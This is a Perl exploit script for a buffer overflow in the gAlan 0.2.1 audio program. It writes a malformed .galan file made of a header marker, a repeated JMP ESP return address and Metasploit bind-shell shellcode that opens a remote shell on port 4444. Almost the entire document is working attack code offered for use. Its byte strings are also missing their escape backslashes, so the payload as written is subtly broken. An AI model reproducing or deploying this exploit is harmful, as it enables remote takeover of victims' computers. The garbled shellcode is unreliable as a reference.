# Title : gAlan 0.2.1 Buffer Overflow 0day Exploit
# Published : 2009-12-07
# Author : Jeremy Brown
#!/usr/bin/perl
# kpasa.pl
# AKA
# gAlan Buffer Overflow 0day Exploit
#
# Jeremy Brown [0xjbrown41@gmail.com//jbrownsec.blogspot.com//krakowlabs.com] 12.07.2009
#
# *********************************************************************************************************
#
# "From Static Analysis to 0day Exploit"
#
# Originally a SecurityTubeCon Presentation, which I'm guessing was canceled without notice? At any rate,
# DoJoSec picked it up so thanks to those guys for that.
#
# Presentation: http://www.viddler.com/explore/dojosec/videos/3/
#
# not_you: "gotta restart (sp1 install vista)"
# me: "i don't see how you use that operating system"
#
# kpasa.pl
# windows/shell_bind_tcp - 696 bytes
# http://www.metasploit.com
# Encoder: x86/alpha_mixed
# EXITFUNC=seh, LPORT=4444
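use strict;
use warnings;

# Builds the malformed .galan file used by the gAlan 0.2.1 overflow described
# in the header.  The output file, in order (the layout a detection rule can
# key on: a file starting with "Mjik" followed by one 4-byte value repeated
# hundreds of times):
#   "Mjik"                       4-byte leading marker (named "magic" originally)
#   pack('l', $addr) x 258       one address repeated 258 times
#   "x90" x 256                  filler region as listed
#   $shellcode                   metasploit windows/shell_bind_tcp, alpha_mixed
# All string literals are reproduced exactly as they appear in the listing.
our $shellcode =
"x89xe0xddxc7xd9x70xf4x5bx53x59x49x49x49x49" .
"x49x49x49x49x49x49x43x43x43x43x43x43x37x51" .
"x5ax6ax41x58x50x30x41x30x41x6bx41x41x51x32" .
"x41x42x32x42x42x30x42x42x41x42x58x50x38x41" .
"x42x75x4ax49x4bx4cx43x5ax4ax4bx50x4dx4bx58" .
"x4ax59x4bx4fx4bx4fx4bx4fx45x30x4cx4bx42x4c" .
"x47x54x47x54x4cx4bx51x55x47x4cx4cx4bx43x4c" .
"x44x45x43x48x45x51x4ax4fx4cx4bx50x4fx45x48" .
"x4cx4bx51x4fx47x50x43x31x4ax4bx51x59x4cx4b" .
"x50x34x4cx4bx43x31x4ax4ex46x51x49x50x4dx49" .
"x4ex4cx4bx34x49x50x44x34x43x37x49x51x48x4a" .
"x44x4dx43x31x49x52x4ax4bx4cx34x47x4bx50x54" .
"x51x34x46x48x43x45x4dx35x4cx4bx51x4fx46x44" .
"x45x51x4ax4bx43x56x4cx4bx44x4cx50x4bx4cx4b" .
"x51x4fx45x4cx45x51x4ax4bx43x33x46x4cx4cx4b" .
"x4cx49x42x4cx47x54x45x4cx43x51x48x43x46x51" .
"x49x4bx45x34x4cx4bx47x33x46x50x4cx4bx47x30" .
"x44x4cx4cx4bx42x50x45x4cx4ex4dx4cx4bx51x50" .
"x43x38x51x4ex43x58x4cx4ex50x4ex44x4ex4ax4c" .
"x46x30x4bx4fx49x46x45x36x51x43x45x36x42x48" .
"x47x43x50x32x42x48x44x37x42x53x47x42x51x4f" .
"x50x54x4bx4fx48x50x45x38x48x4bx4ax4dx4bx4c" .
"x47x4bx50x50x4bx4fx48x56x51x4fx4cx49x4bx55" .
"x43x56x4dx51x4ax4dx44x48x43x32x46x35x43x5a" .
"x43x32x4bx4fx4ex30x42x48x48x59x44x49x4cx35" .
"x4ex4dx46x37x4bx4fx49x46x46x33x51x43x46x33" .
"x51x43x46x33x47x33x51x43x47x33x46x33x4bx4f" .
"x48x50x42x46x43x58x42x31x51x4cx45x36x50x53" .
"x4cx49x4dx31x4dx45x42x48x49x34x44x5ax44x30" .
"x48x47x50x57x4bx4fx4ex36x42x4ax42x30x46x31" .
"x51x45x4bx4fx48x50x45x38x49x34x4ex4dx46x4e" .
"x4dx39x46x37x4bx4fx48x56x46x33x51x45x4bx4f" .
"x48x50x45x38x4bx55x51x59x4bx36x51x59x50x57" .
"x4bx4fx49x46x50x50x51x44x51x44x46x35x4bx4f" .
"x4ex30x4dx43x43x58x4dx37x42x59x49x56x42x59" .
"x50x57x4bx4fx48x56x46x35x4bx4fx4ex30x45x36" .
"x43x5ax43x54x45x36x43x58x42x43x42x4dx4dx59" .
"x4bx55x43x5ax50x50x46x39x47x59x48x4cx4dx59" .
"x4bx57x42x4ax51x54x4bx39x4ax42x50x31x49x50" .
"x4cx33x4ex4ax4bx4ex50x42x46x4dx4bx4ex50x42" .
"x46x4cx4cx53x4cx4dx42x5ax50x38x4ex4bx4ex4b" .
"x4ex4bx42x48x44x32x4bx4ex48x33x45x46x4bx4f" .
"x42x55x50x44x4bx4fx49x46x51x4bx46x37x46x32" .
"x50x51x46x31x46x31x43x5ax45x51x46x31x50x51" .
"x50x55x50x51x4bx4fx4ex30x42x48x4ex4dx49x49" .
"x44x45x48x4ex51x43x4bx4fx48x56x42x4ax4bx4f" .
"x4bx4fx46x57x4bx4fx48x50x4cx4bx50x57x4bx4c" .
"x4cx43x49x54x45x34x4bx4fx48x56x46x32x4bx4f" .
"x48x50x45x38x4ax50x4cx4ax44x44x51x4fx51x43" .
"x4bx4fx49x46x4bx4fx48x50x41x41";

our $magic    = "Mjik";
our $addr     = 0x7E429353;       # JMP ESP @ user32.dll (as given by the author)
our $filename = "bof.galan";

# 'l' is a 32-bit signed integer in host byte order, exactly as the original
# packed it; $addr is positive so it fits without wrapping.
our $retaddr = pack('l', $addr);

# `x` binds tighter than `.`, so this is magic . (addr x 258) . (sled x 256) . shellcode.
our $payload = $magic . $retaddr x 258 . "x90" x 256 . $shellcode;

# Three-argument open with a lexical handle: the mode is no longer parsed out of
# the filename, and every I/O step is checked instead of failing silently.
open my $fh, '>', $filename or die "open $filename: $!";
binmode $fh or die "binmode $filename: $!";   # raw bytes, no newline translation
print {$fh} $payload or die "write $filename: $!";
close $fh or die "close $filename: $!";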